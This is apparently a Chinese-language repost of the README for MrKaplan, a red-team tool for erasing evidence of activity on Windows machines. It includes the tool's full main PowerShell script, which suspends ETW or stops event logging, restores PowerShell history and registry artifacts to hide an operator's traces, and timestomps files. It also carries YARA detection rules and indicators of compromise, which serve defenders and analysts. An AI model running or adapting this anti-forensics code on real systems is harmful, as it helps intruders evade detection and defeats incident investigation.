Idov31/MrKaplan

描述

MrKaplan 是一种工具,旨在通过清除执行证据来帮助红队人员保持隐藏状态。它的工作原理是保存运行时间、文件快照等信息,并将每个证据与相关用户相关联。
这个工具的灵感来自MoonWalk,这是一个用于 Unix 机器的类似工具。
您可以在wiki页面中阅读有关它的更多信息。

功能

  • 停止事件记录
  • 清除文件工件
  • 清除注册表工件
  • 可以为多个用户运行
  • 可以作为用户和管理员运行(强烈建议以管理员身份运行)
  • 可以保存文件的时间戳
  • 可以排除某些操作并将工件留给蓝队

    用法

  • 在计算机上开始操作之前,使用开始标志运行 MrKaplan,每当您完成时再次使用结束标志运行它。

  • 不要删除 MrKaplan 注册表项,否则 MrKaplan 将无法使用该信息。

MrKaplan:隐藏和清理代码执行痕迹 - 图1

代码

YARA

  1. /*
  2. A rule to detect MrKaplan.
  3. Author: Ido Veltzman (Idov31)
  4. Date: 15-04-2022
  5. */
  6. rule MrKaplanStandalone {
  7. meta:
  8. description = "A rule to detect MrKaplanStandalone."
  9. author = "Idov31"
  10. date = "2022-04-15"
  11. strings:
  12. $imports1 = /[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(.*) | Invoke-Expression/i nocase
  13. $imports2 = /[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(.*) | iex/i nocase
  14. $s1 = "MrKaplan.ps1" ascii nocase
  15. $s2 = "Clear-Evidence" ascii nocase
  16. $s3 = "EventLogSettings" ascii nocase
  17. $s4 = "runAsUser" ascii nocase
  18. $s5 = "PSHistory" ascii nocase
  19. $s6 = "C:\\Users\\$($user)\\AppData\\Roaming\\Microsoft\\Windows\\PowerShell\\PSReadLine\\ConsoleHost_history.txt" ascii nocase
  20. $s7 = "HKCU:\Software\MrKaplan" ascii nocase
  21. $s8 = "Invoke-StompFiles" ascii nocase
  22. $s9 = "Clear-Files" ascii nocase
  23. $s10 = "Clear-Registry" ascii nocase
  24. $s11 = "Invoke-RestoreEtw" ascii nocase
  25. $s12 = "Invoke-LogFileToStomp" ascii nocase
  26. $s13 = "Invoke-SuspendEtw" ascii nocase
  27. conditions:
  28. any of $imports* and 3 of ($s*)
  29. }
  30. rule MrKaplan {
  31. meta:
  32. description = "A rule to detect MrKaplan."
  33. author = "Idov31"
  34. date = "2022-04-15"
  35. strings:
  36. $imports1 = "Import-Module .\\Modules\\Registry.psm1" ascii nocase
  37. $imports2 = "Import-Module .\\Modules\\Files.psm1" ascii nocase
  38. $imports3 = "Import-Module .\\Modules\\Eventlogs.psm1" ascii nocase
  39. $imports4 = "Import-Module .\\Modules\\Utils.psm1" ascii nocase
  40. $imports5 = "ipmo .\\Modules\\Registry.psm1" ascii nocase
  41. $imports6 = "ipmo .\\Modules\\Files.psm1" ascii nocase
  42. $imports7 = "ipmo .\\Modules\\Eventlogs.psm1" ascii nocase
  43. $imports8 = "ipmo .\\Modules\\Utils.psm1" ascii nocase
  44. $s1 = "MrKaplan.ps1" ascii nocase
  45. $s2 = "Clear-Evidence" ascii nocase
  46. $s3 = "EventLogSettings" ascii nocase
  47. $s4 = "runAsUser" ascii nocase
  48. $s5 = "PSHistory" ascii nocase
  49. $s6 = "C:\\Users\\$($user)\\AppData\\Roaming\\Microsoft\\Windows\\PowerShell\\PSReadLine\\ConsoleHost_history.txt" ascii nocase
  50. $s7 = "HKCU:\Software\MrKaplan" ascii nocase
  51. $s8 = "Invoke-StompFiles" ascii nocase
  52. $s9 = "Clear-Files" ascii nocase
  53. $s10 = "Clear-Registry" ascii nocase
  54. $s11 = "Invoke-RestoreEtw" ascii nocase
  55. $s12 = "Invoke-LogFileToStomp" ascii nocase
  56. $s13 = "Invoke-SuspendEtw" ascii nocase
  57. conditions:
  58. 4 of $imports* and 3 of ($s*)
  59. }

PowerShell

  1. param (
  2. [Parameter(Mandatory=$true)]
  3. [String]
  4. $operation,
  5. [String]
  6. $etwBypassMethod,
  7. [String]
  8. $stompedFilePath,
  9. [String[]]
  10. $users,
  11. [String[]]
  12. $exclusions,
  13. [Switch]
  14. $runAsUser = $false
  15. )
  16. Import-Module .\Modules\Registry.psm1
  17. Import-Module .\Modules\Files.psm1
  18. Import-Module .\Modules\Eventlogs.psm1
  19. Import-Module .\Modules\Utils.psm1
  20. $rootKeyPath = "HKCU:\Software\MrKaplan"
  21. $PSDefaultParameterValues['*:Encoding'] = 'utf8'
  22. $usage = "`n[*] Possible Usage:`n`n[*] Show help message:`n`t.\MrKaplan.ps1 help`n`n[*] For config creation and start:`n`t.\MrKaplan.ps1 begin`n`t.\MrKaplan.ps1 begin -Users Reddington,Liz`n`t.\MrKaplan.ps1 begin -Users Reddington`n`t.\MrKaplan.ps1 begin -EtwBypassMethod overflow`n`t.\MrKaplan.ps1 begin -RunAsUser`n`t.\MrKaplan.ps1 begin -Exclusions BamKey, OfficeHistory`n`n[*] For cleanup:`n`t.\MrKaplan.ps1 end`n`n[*] To save file's timestamps:`n`t.\MrKaplan.ps1 timestomp -StompedFilePath C:\path\to\file`n`n"
  23. if (Test-Path "banner.txt") {
  24. $banner = Get-Content -Path "banner.txt" -Raw
  25. Write-Host $banner
  26. }
  27. function New-Config {
  28. param (
  29. [String[]]
  30. $users,
  31. [String]
  32. $etwBypassMethod,
  33. [String[]]
  34. $exclusions
  35. )
  36. New-PSDrive -PSProvider Registry -Name HKU -Root HKEY_USERS
  37. if (Test-Path $rootKeyPath) {
  38. Write-Host "[-] Config already exists, please delete the current and rerun." -ForegroundColor Red
  39. return $false
  40. }
  41. New-Item -Path $rootKeyPath
  42. New-Item -Path $rootKeyPath -Name "Users"
  43. if (-not $exclusions) {
  44. $exclusions = @()
  45. }
  46. # Stopping the event logging.
  47. if (-not $runAsUser) {
  48. New-ItemProperty -Path $rootKeyPath -Name "RunAsUser" -PropertyType "DWord" -Value $false
  49. if (-not $exclusions.Contains("eventlogs")) {
  50. Write-Host "[*] Stopping event logging..." -ForegroundColor Blue
  51. if ($etwBypassMethod -eq "overflow") {
  52. Write-Host "[*] This method won't allow any regular user to log in until you end MrKaplan." -ForegroundColor Yellow
  53. if ($(Read-Host "Are you sure? [y/n]") -eq "y") {
  54. $etwMetadata = Get-EventLogsSettings
  55. if ($etwMetadata.Count -eq 0) {
  56. return $false
  57. }
  58. if (!$(Clear-EventLogging)) {
  59. return $false
  60. }
  61. New-Item -Path $rootKeyPath -Name "EventLogSettings"
  62. foreach ($setting in $etwMetadata.GetEnumerator()) {
  63. New-ItemProperty -Path "$($rootKeyPath)\EventLogSettings" -Name $setting.Name -Value $setting.Value
  64. }
  65. }
  66. else {
  67. Write-Host "[-] Exiting..." -ForegroundColor Red
  68. return $false
  69. }
  70. }
  71. elseif ($etwBypassMethod -eq "suspend" -or $etwBypassMethod -eq "") {
  72. $etwMetadata = Invoke-SuspendEtw
  73. if ($etwMetadata.Count -eq 0) {
  74. return $false
  75. }
  76. New-Item -Path $rootKeyPath -Name "EventLogSettings"
  77. foreach ($setting in $etwMetadata[1].GetEnumerator()) {
  78. New-ItemProperty -Path "$($rootKeyPath)\EventLogSettings" -Name $setting.Name -Value $setting.Value
  79. }
  80. }
  81. else {
  82. Write-Host "[-] Unknown ETW patching method, exiting..." -ForegroundColor Red
  83. return $false
  84. }
  85. Write-Host "[+] Stopped event logging." -ForegroundColor Green
  86. }
  87. if (-not $exclusions.Contains("appcompatcache")) {
  88. Copy-Item "HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\AppCompatCache" -Destination "$($rootKeyPath)\AppCompatCache" -Force -Recurse
  89. }
  90. }
  91. else {
  92. New-ItemProperty -Path $rootKeyPath -Name "RunAsUser" -Value $true
  93. }
  94. if ($users) {
  95. if (!$runAsUser) {
  96. $users.Add($env:USERNAME)
  97. }
  98. else {
  99. Write-Host "[-] Cannot use both run as user and users!" -ForegroundColor Red
  100. return $false
  101. }
  102. }
  103. else {
  104. $users = @($env:USERNAME)
  105. }
  106. # Saving current time.
  107. New-ItemProperty -Path $rootKeyPath -Name "Time" -Value $(Get-Date).DateTime
  108. # Saving user data.
  109. $comDlg32Path = "SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32"
  110. foreach ($user in $users) {
  111. if ($exclusions.Contains("pshistory")) {
  112. $powershellHistory = ""
  113. }
  114. else {
  115. $powershellHistoryFile = "C:\Users\$($user)\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt"
  116. if (Test-Path $powershellHistoryFile) {
  117. $powershellHistory = [Convert]::ToBase64String([IO.File]::ReadAllBytes($powershellHistoryFile))
  118. }
  119. else {
  120. $powershellHistory = ""
  121. }
  122. }
  123. New-Item -Path "$($rootKeyPath)\Users" -Name $user
  124. New-ItemProperty -Path "$($rootKeyPath)\Users\$($user)" -Name "PSHistory" -Value $powershellHistory
  125. if (-not $exclusions.Contains("comdlg32")) {
  126. $sid = $(New-Object System.Security.Principal.NTAccount($user)).Translate([System.Security.Principal.SecurityIdentifier]).Value
  127. if (!(Test-Path "HKU:\$($sid)\$($comDlg32Path)")) {
  128. continue
  129. }
  130. Copy-Item "HKU:\$($sid)\$($comDlg32Path)" -Destination "$($rootKeyPath)\Users\$($user)" -Force -Recurse
  131. }
  132. }
  133. New-ItemProperty -Path $rootKeyPath -Name "Exclusions" -Value $exclusions
  134. return $true
  135. }
  136. function Clear-Evidence {
  137. $result = $true
  138. # Parsing the config.
  139. if (-not (Test-Path $rootKeyPath)) {
  140. Write-Host "[-] Config doesn't exist" -ForegroundColor Red
  141. return $false
  142. }
  143. # Running the modules on each user.
  144. Write-Host "[*] Cleaning logs..." -ForegroundColor Blue
  145. $users = $(Get-ChildItem -Path "$($rootKeyPath)\Users" | Select-Object PSChildName).PSChildName
  146. $runAsUser =$(Get-ItemProperty -Path $rootKeyPath -Name "RunAsUser").RunAsUser
  147. $time = $(Get-ItemProperty -Path $rootKeyPath -Name "Time").Time
  148. $exclusions = $(Get-ItemProperty -Path $rootKeyPath -Name "Exclusions").Exclusions
  149. # Stomping the files.
  150. $filesToStomp = @{}
  151. if (Test-Path "$($rootKeyPath)\StompedFiles") {
  152. $regFilesToStomp = Get-ItemProperty "$($rootKeyPath)\StompedFiles"
  153. $regFilesToStomp.PsObject.Properties |
  154. ForEach-Object {
  155. $filesToStomp[$_.Name] = $_.Value
  156. }
  157. }
  158. Invoke-StompFiles $filesToStomp
  159. foreach ($user in $users) {
  160. $psHistory = $(Get-ItemProperty -Path "$($rootKeyPath)\Users\$($user)" -Name "PSHistory").PSHistory
  161. if (-not $(Clear-Files $time $psHistory $user $runAsUser $exclusions)) {
  162. Write-Host "[-] Failed to clean files for $($user)." -ForegroundColor Red
  163. $result = $false
  164. }
  165. }
  166. if (!$(Clear-Registry $time $users $runAsUser $exclusions $rootKeyPath)) {
  167. Write-Host "[-] Failed to cleanup the registry." -ForegroundColor Red
  168. $result = $false
  169. }
  170. # Restoring the event logging.
  171. if (!$runAsUser -and -not $exclusions.Contains("eventlogs")) {
  172. Write-Host "[*] Restoring event logging..." -ForegroundColor Blue
  173. if (Test-Path "$($rootKeyPath)\EventLogSettings") {
  174. $etwMetadata = @{}
  175. $regEventLog = Get-ItemProperty "$($rootKeyPath)\EventLogSettings"
  176. $regEventLog.PsObject.Properties |
  177. ForEach-Object {
  178. $etwMetadata[$_.Name] = $_.Value
  179. }
  180. if (!$(Invoke-RestoreEtw $etwMetadata)) {
  181. Write-Host "[-] Failed to restore the eventlogging." -ForegroundColor Red
  182. $result = $false
  183. }
  184. }
  185. }
  186. if ($result) {
  187. Write-Host "[+] Restored! Be careful with your actions now." -ForegroundColor Green
  188. Remove-Item -Path $rootKeyPath -Recurse -Force
  189. }
  190. else {
  191. Write-Host "[!] Finished with partial restoration." -ForegroundColor Yellow
  192. }
  193. return $result
  194. }
  195. if ($operation -eq "begin") {
  196. for ($i = 0; $i -lt $exclusions.Count; $i++) {
  197. $exclusions[$i] = $exclusions[$i].ToLower()
  198. }
  199. if (New-Config $users $etwBypassMethod $exclusions) {
  200. Write-Host "`n[+] Saved required information!`n[+] You can do your operations." -ForegroundColor Green
  201. }
  202. else {
  203. Write-Host "`n[-] Failed to create config file." -ForegroundColor Red
  204. }
  205. }
  206. elseif ($operation -eq "end") {
  207. if (Clear-Evidence) {
  208. Write-Host "`n[+] All evidences cleared!" -ForegroundColor Green
  209. }
  210. else {
  211. Write-Host "`n[-] Failed to clear all evidences." -ForegroundColor Red
  212. }
  213. }
  214. elseif ($operation -eq "timestomp") {
  215. if (Invoke-LogFileToStomp $rootKeyPath $stompedFilePath) {
  216. Write-Host "`n[+] Saved file's timestamps." -ForegroundColor Green
  217. }
  218. else {
  219. Write-Host "`n[-] Failed to save timestamps." -ForegroundColor Red
  220. }
  221. }
  222. elseif ($operation -eq "help") {
  223. Write-Host $usage -ForegroundColor Blue
  224. }
  225. else {
  226. Write-Host "`n[!] Invalid Usage!" -ForegroundColor Red
  227. Write-Host $usage -ForegroundColor Blue
  228. }

IoCs

  • 访问 wiki 页面中提到的工件的 Powershell 进程。
  • Powershell 导入奇怪的 base64 blob。
  • 执行令牌操作的 Powershell 进程。
  • MrKaplan 的注册表项:HKCU:\Software\MrKaplan。

    致谢

  • PowerSploit

  • Phant0m
  • ForensicArtifacts

    免责声明

    对于由于此项目而对您的计算机/程序造成的任何损害,我概不负责。我很高兴接受贡献,提出拉取请求,我会审查它!